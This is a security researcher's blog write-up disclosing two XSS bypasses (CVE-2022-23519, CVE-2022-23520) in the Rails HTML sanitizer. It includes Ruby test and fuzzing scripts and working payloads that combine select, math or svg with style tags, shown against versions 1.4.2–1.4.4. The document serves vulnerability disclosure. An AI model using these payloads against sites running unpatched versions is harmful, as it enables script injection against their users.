A Tale of Two XSS in the Rails HTML Sanitizer

12 minute read Published: 20 Dec, 2022

Short write-up on CVE-2022-23519 and CVE-2022-23520, two XSS vulnerabilities in the Rails HTML sanitizer. There are some explanations of the vulnerabilities, the though process and code snippets used for fuzzing.

Table of Contents

A while ago I was writing an application based on the Rails framework which returned sanitized user input. Its purpose was to build a PoC for an XSS vulnerability in the Rails HTML sanitizer (CVE-2022-32209, which appeared in June 2022). The following is a short write-up of that endeavour and how it turned into the discovery of two additional CVEs.

I start with a discussion of the original CVE-2022-32209, proceed with an investigation of the fix and how it turned out to be incomplete (CVE-2022-23520), explain how that motivated additional fuzzing which uncovered additional working attack payloads (CVE-2022-23519) and conclude with a brief outline of the fix (entirely designed and implemented by flavorjones).

CVE-2022-32209: XSS when select and style tags are allowed

The Rails HTML sanitizer gives Rails developers the ability to accept user input that contains HTML and return that HTML to (other) users, but without introducing XSS. It does that by allowing only selected sets of HTML tags and attributes and scrubbing the rest. As a developer, you can modify these allow lists. Of course, you should not do anything stupid like adding script to the allow list of HTML tags. Beyond that though, the job of the sanitizer is to work with any reasonable allow list developers come up with.

The starting point for CVE-2022-32209 is this HackerOne report. It describes how the Rails HTML sanitizer does not work properly when both the style and select tags are allowed.

Lets write a small script to see what happens. I’ve stored it in a file sanitize-1-4-2.rb to emphasize that the version of the Rails sanitizer is pinned to 1.4.2. This is the code (heavily inspired by flavorjones, the author of the sanitizer, see here):

#! /usr/bin/env ruby

require "bundler/inline"
require 'bundler'

Bundler.configure_gem_home_and_path ".cache/bundler"
gemfile do
  source "https://rubygems.org"
  gem "rails-html-sanitizer", "=1.4.2"
end

require "rails-html-sanitizer"

if ARGV.length != 2
  puts "Pass 2 arguments:"
  puts " 1st the string to sanitize"
  puts " 2nd the tags you want to whitelist"
  exit
end

input = ARGV[0]
tags = ARGV[1].split(' ')

puts "Current Version  : " + Rails::Html::Sanitizer::VERSION
puts "Input string     : " + input
puts "Allowed tags     : " + tags.join(' ')

def sanitize(input, tags)
  Rails::Html::SafeListSanitizer.new.sanitize(input, tags: tags)
end

puts "Output           : " + sanitize(input, tags)

The script accepts two arguments: first a string to sanitize and second a list of allowed HTML tags. Then it will print the sanitized string to your console. Run it and you see that the sanitizer does a good job of sanitizing HTML:

user@notebook:~$ ./sanitize-1-4-2.rb '<div><script>alert()</script></div> <img src=x onerror=alert()>' 'div img'
Current Version  : 1.4.2
Input string     : <div><script>alert()</script></div> <img src=x onerror=alert()>
Allowed tags     : div img
Output           : <div>alert()</div> <img src="x">

We allowed both div and img as tags and the sanitizer removed all other dangerous tags and attributes from the HTML string. The script tag is gone and the onerror attribute of the img tag is removed too.

However, run it with the following input string while allowing tags select and style and surprisingly, the script tag in the input string remains exactly where it is:

user@notebook:~$ ./sanitize-1-4-2.rb '<select><style><script>alert()</script></style></select>' 'select style'
Current Version  : 1.4.2
Input string     : <select><style><script>alert()</script></style></select>
Allowed tags     : select style
Output           : <select><style><script>alert()</script></style></select>

The original HackerOne report used a slightly different, malformed string as input but it basically worked with the simple string above, as we’ve just seen. Version 1.4.3 rolled out a fix for the vulnerability, so everything should be fine when using that version.

CVE-2022-23520: Incomplete fix for CVE-2022-32209

Now one day I was building a small application in Rails and wanted to update my sanitizer to fix CVE-2022-32209. A small change in the Gemfile was all it took. Then I’ve testet the payload shown above to make sure the Gem was actually updated. To my surprise though, the application was still vulnerable. First I convinced myself that the problem was not me being too stupid to update a Gem, then I went off investigating what was going on here.

Code for the sanitizer lives in its own repository at github.com/rails/rails-html-sanitizer. Looking at the recent commits, I found this one, which seemed to be the fix for CVE-2022-32209. Basically, all it does is define a new private method remove_safelist_tag_combinations on the sanitizer, which removes style from the list of allowed tags if select is in there too. This new method is used within another method allowed_tags, whose responsibility is to return the list of allowed tags and which is used within the sanitize method. See the relevant code below:

module Rails
  module Html
    class SafeListSanitizer < Sanitizer
    ...

      def sanitize(html, options = {})
        ...
        elsif allowed_tags(options) || allowed_attributes(options)
          @permit_scrubber.tags = allowed_tags(options)
        ...
      end
      ...

      private

      ...

      def remove_safelist_tag_combinations(tags)
        if !loofah_using_html5? && tags.include?("select") && tags.include?("style")
          warn("WARNING: #{self.class}: removing 'style' from safelist, should not be combined with 'select'")
          tags.delete("style")
        end
        tags
      end

      def allowed_tags(options)
        if options[:tags]
          remove_safelist_tag_combinations(options[:tags])
        else
          self.class.allowed_tags
        end
      end

      ...
    end
  end
end

You may have noticed that the method remove_safelist_tag_combinations is applied to the allowed tags only if they are passed within the options. If no tags are in the options, allowed_tags falls back to the class variable Rails::Html::SafeListSanitizer.allowed_tags, which contains a default value with a few harmless tags (source code). So far so good. All of this looks solid at first sight.

When building an application in Rails, you don’t use the Gem explicitly. Rather, it is part of the framework and “just there”. The documentation of Rails tells you how to use it here. In the docs you find different ways in which you can pass custom allowed tag lists. One is to use the Rails config/application.rb and set something like config.action_view.sanitized_allowed_tags = ["select", "style"]. The allow list will then be applied globally in your application. Another is to pass it explicitly as an option when calling the sanitizer, e.g., in your ERB templates. It could look like this: <p>Hello <%= sanitize @name, tags: ["select", "style"] %></p>. In this case, the allow list will be specific to this call.

When I updated my application and the fix did not work, I used the first of the ways shown above, i.e., setting an allow list in config/application.rb. It turned out that the way this setting works is that it overwrites the class variable Rails::Html::SafeListSanitizer.allowed_tags, which I think is exposed here in the ActionView helpers. As we saw above, the new method remove_safelist_tag_combinations does not apply to that list (since it was mistakenly assumed to be constant?). This means the fix does not work when setting allowed tags via config.

You can convince yourself of the behaviour with this simple script which I’ve named sanitize-1-4-3.rb:

#! /usr/bin/env ruby

require "bundler/inline"
require 'bundler'

Bundler.configure_gem_home_and_path ".cache/bundler"

gemfile do
  source "https://rubygems.org"
  gem "rails-html-sanitizer", "=1.4.3"
end

require "rails-html-sanitizer"

if ARGV.length != 2
  puts "Pass 2 arguments:"
  puts " 1st the string to sanitize"
  puts " 2nd the tags you want to whitelist"
  exit
end

input = ARGV[0]
tags = ARGV[1].split(' ')

puts "Current Version         : " + Rails::Html::Sanitizer::VERSION
puts "Input string            : " + input
puts "Allowed tags            : " + tags.join(' ')

def sanitize_argument(input, tags)
  Rails::Html::SafeListSanitizer.new.sanitize(input, tags: tags)
end

def sanitize_class_varible(input, tags)
  Rails::Html::SafeListSanitizer.allowed_tags = tags
  output = Rails::Html::SafeListSanitizer.new.sanitize(input)
  Rails::Html::SafeListSanitizer.allowed_tags = nil

  output
end

puts "Output (class variable) : " + sanitize_class_varible(input, tags)
puts "Output (argument)       : " + sanitize_argument(input, tags)

Run it and you get an output as shown below. As you can see, the string is properly sanitized when passing the allow list in the options but not sanitized when the class variable is overwritten:

user@notebook:~$ ./sanitize-1-4-3.rb '<select><style><script>alert()</script></style></select>' 'select style'
Current Version         : 1.4.3
Input string            : <select><style><script>alert()</script></style></select>
Allowed tags            : select style
Output (class variable) : <select><style><script>alert()</script></style></select>
WARNING: Rails::Html::SafeListSanitizer: removing 'style' from safelist, should not be combined with 'select'
Output (argument)       : <select>&lt;script&gt;alert()&lt;/script&gt;</select>

This was reported at HackerOne here and disclosed as CVE-2022-23520 and GHSA-rrfc-7g8p-99q8.

CVE-2022-23519: More XSS for math+style and svg+style

A reader with an eye for details may have noticed something strange about the fix. The method remove_safelist_tag_combinations removes style from the allow list only if three conditions are met:

style is in the list: makes perfect sense, remove style only if it is there
select is in the list: also makes sense, the combination was the problem
!loofah_using_html5?: this reads like “only if we are not using an HTML5 parser”

The third condition raises some suspicion. Could it be that the Rails sanitizer does not use an HTML5-compliant parser? If the parser of the sanitizer is different from the parser of your browser, then there could be a lot more problems than just the select and style tag combination.

To test, I wrote a small fuzzing script named fuzz-1-4-3.rb that would test a few hand-picked XSS payloads wrapped into all possible combinations of two HTML tags against the sanitizer. It looked like this:

#! /usr/bin/env ruby

require "bundler/inline"
require 'bundler'

Bundler.configure_gem_home_and_path ".cache/bundler"

gemfile do
  source "https://rubygems.org"
  gem "rails-html-sanitizer", "=1.4.3"
end

require "rails-html-sanitizer"


puts "[+] Current Version : " + Rails::Html::Sanitizer::VERSION


def render(i, sanitized, wrapped_payload)
  html = <<-EOF
<html>
  <head>
    <script>
      function next() {
        window.location = "file:///tmp/www/file#{i+1}.html";
      }
    </script>
  </head>
  <body onload=next()>
    #{CGI::escapeHTML(wrapped_payload)}
    #{sanitized}
  </body>
</html>
  EOF

  File.write("/tmp/www/file#{i}.html", html)

  sanitized
end


def wrap(tag1, tag2, payload)
  "<#{tag1}><#{tag2}>#{payload}</#{tag1}></#{tag2}>"
end

def sanitize(tag1, tag2, s)
  Rails::Html::SafeListSanitizer.new.sanitize s, tags: [tag1, tag2]
end


html_tags = File.readlines("html-tags.txt", chomp: true)
payloads = {
  "<script>alert()</script>" => ["<script>"],
  "<img src=x onerror=alert()>" => ["onerror", "alert"],
}
i = 0


puts "[+] Generating test files..."
html_tags.each do |tag1|
  html_tags.each do |tag2|
    payloads.each do |payload, indicators|

      wrapped_payload = wrap(tag1, tag2, payload)
      sanitized = sanitize(tag1, tag2, wrapped_payload)
      if indicators.all? { |indicator| sanitized.include? indicator }
        render(i, sanitized, wrapped_payload)
        puts "- Rendered #{i} (allowed tags [#{tag1} #{tag2}]): #{sanitized}"
        i += 1
      end

    end
  end
end

A few explanations. The function render writes numbered HTML test files into /tmp/www/ (numbering should be consecutive, starting at 0). You pass sanitized, which is the previously sanitized string that is embedded in the HTML body. You also pass wrapped_payload, which is rendered to the HTML body in HTML-escaped form (just so you can later see what the payload was). The HTML header contains a script which changes the location to the next test file once the body finished loading (e.g., it navigates to /tmp/www/file1.html if the current file is /tmp/www.file0.html). The idea is that the browser will later navigate from file to file, either until it reaches the end or until one of the sanitized XSS payloads will alert(), which stops the process.

The next functions are wrap, which wraps a payload into two tags tag1 and tag2 and sanitize, which applies sanitization on a string while allowing tag1 and tag2.

The script also relies on a file html-tags.txt from which it reads the wordlist of HTML tags. Mine was compiled from various places and had 136 entries. Find it here.

Finally, I’ve defined a Ruby hash called payloads with two simple XSS payloads, each accompanied with a list of strings I call indicators. The idea of that is to only render test files when the indicator strings are present to avoid rendering files that are unlikely to execute the payload.

Finally, at the bottom of the script, nested loops run through the list of tags and payloads, sanitize the wrapped payload and render the test file if all indicators are present. Note that I pass the allow list as an option to sanitize to avoid getting hits for the known combination of select and style.

Ensure html-tags.txt exists in the current directory, /tmp/www/ exists and is empty, and then run the script with ./fuzz-1-4-3.rb to generate 536 test files. Then open a browser. I’ve used chromium --disable-ipc-flooding-protection. Without the argument it may stop navigating to the next file after a while.

In the browser, navigate to file:///tmp/www/file0.html now, then watch. After a short while, you should see for “file163.html”, which contains the wrapped payload <math><style><img src=x onerror=alert()></math></style></math>:

**XSS payload in file163.html executed**

Keep going and you will get two more hits for “file498.html” and “file499.html”. In the end, all of them are due to the following two combinations of tags, which allow for XSS just like the combination select and style did:

math and style: works for a payload like <math><style><img src=x onerror=alert()></math></style></math>, which the sanitizer will not change
svg and style: works for both payloads <svg><style><script>alert()</script></svg></style></svg> and <svg><style><img src=x onerror=alert()></svg></style></svg>

This was reported at HackerOne here and disclosed as CVE-2022-23519 and GHSA-9h9g-93gc-623h.

The underlying problem and its current fix

If you really want to know what is going on under the hood then stop reading this and go to these decision notes instead. You will find a very extensive and detailed analysis of these and other related CVEs there (note that the repository is github.com/flavorjones/loofah, which is the actual implementation of the Rails HTML sanitizer).

The short summary of this analysis: the problem is indeed the use of an HTML4 parser. An HTML4 DOM seems to treat the contents of the style tags as CDATA which needs no escaping or sanitization. In an HTML5 DOM however everything inside math and svg tags is “foreign content” and special parsing rules apply. For example, for the case of <math><style><img src=x onerror=alert()></math></style></math>, an HTML5 parser seems to treat the img tag within math and style as an error and repairs the DOM for you by moving it out (as described here).

The fix this time appears to be this commit, which is an implementation of solution two presented in the decision notes. Effectively it now escapes everything the HTML4 parser parses as CDATA.

You can convince yourself by building a test script as those shown above, but for version 1.4.4 of the Gem. Run it and you see that the characters <, > and & are escaped now:

user@notebook:~$ ./sanitize-1-4-4.rb '<math><style><img src=x onerror=alert()></math></style></math>' 'math style'
Current Version  : 1.4.4
Input string     : <math><style><img src=x onerror=alert()></math></style></math>
Allowed tags     : math style
Output           : <math><style>&lt;img src=x onerror=alert()&gt;&lt;/math&gt;</style></math>

Moreover, if you re-run the fuzzing script with the Gem version bumped to 1.4.4, you still get a 269 test files but none of them hit anymore. Thus, it looks to me as if this particular issue is finally gone.